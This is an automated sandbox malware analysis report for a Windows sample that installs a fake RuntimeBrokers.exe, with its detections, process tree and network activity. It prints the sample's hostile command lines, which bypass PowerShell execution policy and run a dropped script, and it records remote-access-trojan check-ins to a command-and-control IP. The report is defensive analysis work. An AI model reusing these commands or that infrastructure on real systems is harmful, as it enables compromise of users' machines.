Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Fqae7BLq4m.exe

Overview

General Information

Sample name:Fqae7BLq4m.exe
Analysis ID:1579418
MD5:a994f2b3b899758bddf5f35e407a694d
SHA1:a13dedaceed797a4ee8b399c7db20e88535ab6cc
SHA256:6c547f7a7e7964a03945cef9bd53e792256e2beb24e15be780714ae349c8a81b
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Loading BitLocker PowerShell Module
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • Fqae7BLq4m.exe (PID: 6284 cmdline: "C:\Users\user\Desktop\Fqae7BLq4m.exe" MD5: A994F2B3B899758BDDF5F35E407A694D)
    • cmd.exe (PID: 4348 cmdline: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • RuntimeBrokers.exe (PID: 8220 cmdline: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe MD5: 30A274E00DA842B09E9763F19777ADED)
        • cmd.exe (PID: 8848 cmdline: cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • tasklist.exe (PID: 8912 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 8944 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 8196 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 3240 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7572 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 592 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 4480 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 6748 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 1728 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 2396 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 5332 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 788 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 4000 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 8056 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 8164 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6048 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 3512 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 1060 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6008 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7468 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 7544 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6808 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7744 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 6276 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 8944 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 3012 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 7076 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6928 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7416 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 4456 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6172 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 4332 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 2140 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6984 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7464 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 2420 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 8788 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • cmd.exe (PID: 8964 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • powershell.exe (PID: 9036 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 8984 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 9028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • powershell.exe (PID: 9104 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, CommandLine: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, NewProcessName: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, OriginalFileName: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4348, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, ProcessId: 8220, ProcessName: RuntimeBrokers.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, ParentImage: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, ParentProcessId: 8220, ParentProcessName: RuntimeBrokers.exe, ProcessCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 8964, ProcessName: cmd.exe
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 43.250.172.42, DestinationIsIpv6: false, DestinationPort: 18852, EventID: 3, Image: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, Initiated: true, ProcessId: 8220, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49766
Source: Process startedAuthor: frack113: Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8964, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 9036, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8964, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 9036, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-22T09:45:56.226506+010020528751A Network Trojan was detected192.168.11.204976743.250.172.4217091TCP
2024-12-22T09:49:10.745908+010020528751A Network Trojan was detected192.168.11.204977443.250.172.4217091TCP
2024-12-22T09:50:22.475076+010020528751A Network Trojan was detected192.168.11.204977843.250.172.4217091TCP
2024-12-22T09:51:31.826363+010020528751A Network Trojan was detected192.168.11.204978143.250.172.4217092TCP
2024-12-22T09:52:33.964927+010020528751A Network Trojan was detected192.168.11.204978343.250.172.4217092TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Users\user\AppData\Local\Temp\backup.dllReversingLabs: Detection: 42%
Source: C:\Users\Public\Bilite\Axialis\libcurl.dllReversingLabs: Detection: 42%
Source: Fqae7BLq4m.exeReversingLabs: Detection: 42%
Source: Fqae7BLq4m.exeVirustotal: Detection: 19%Perma Link
Source: Fqae7BLq4m.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201220974867.0000000008585000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201220974867.00000000085A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \YSS\Release\libcurl.pdb source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201214927053.000000000710B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb>1 source: powershell.exe, 0000000E.00000002.201222818106.00000000086C6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: G:\ZCSD\XZRecordAlone\xzrecordalone\Release\XZCalendarServer.pdb source: RuntimeBrokers.exe, 00000004.00000000.200383225107.0000000000CFF000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000E.00000002.201222343312.0000000008672000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201222818106.00000000086C6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb], source: powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb, source: powershell.exe, 0000000E.00000002.201222343312.0000000008672000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb0 source: powershell.exe, 0000000E.00000002.201214927053.000000000710B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: z:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: x:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: v:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: t:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: r:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: p:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: n:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: l:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: j:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: h:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: f:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: d:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: b:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: y:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: w:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: u:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: s:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: q:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: o:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: m:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: k:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: i:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: g:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: e:Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: [:Jump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_0040301A
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402B79

Networking

barindex
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.11.20:49767 -> 43.250.172.42:17091
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.11.20:49774 -> 43.250.172.42:17091
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.11.20:49778 -> 43.250.172.42:17091
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.11.20:49781 -> 43.250.172.42:17092
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.11.20:49783 -> 43.250.172.42:17092
Source: global trafficTCP traffic: 43.250.172.42 ports 18852,17091,17092,1,2,5,8
Source: global trafficTCP traffic: 192.168.11.20:49766 -> 43.250.172.42:18852
Source: Joe Sandbox ViewASN Name: VPSQUANUS VPSQUANUS
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: unknownTCP traffic detected without corresponding DNS query: 43.250.172.42
Source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 0000000D.00000002.201197665101.0000000003320000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000D.00000002.201197665101.0000000003320000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: RuntimeBrokers.exe, 00000004.00000000.200383225107.0000000000CFF000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://dump.mgr.xzdesktop.cqttech.com/api/DumpInfoStat%s_%d-%02d-%02d.log
Source: powershell.exe, 0000000D.00000002.201206447534.0000000006368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201209286352.00000000058F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.drString found in binary or memory: http://ocsp.comodoca.com0
Source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.drString found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4
Source: powershell.exe, 0000000D.00000002.201200701612.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000D.00000002.201200701612.0000000005301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.0000000004891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.201200701612.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
Source: powershell.exe, 0000000E.00000002.201214927053.0000000007114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.o
Source: powershell.exe, 0000000D.00000002.201197665101.0000000003320000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 0000000D.00000002.201200701612.0000000005301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.0000000004891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
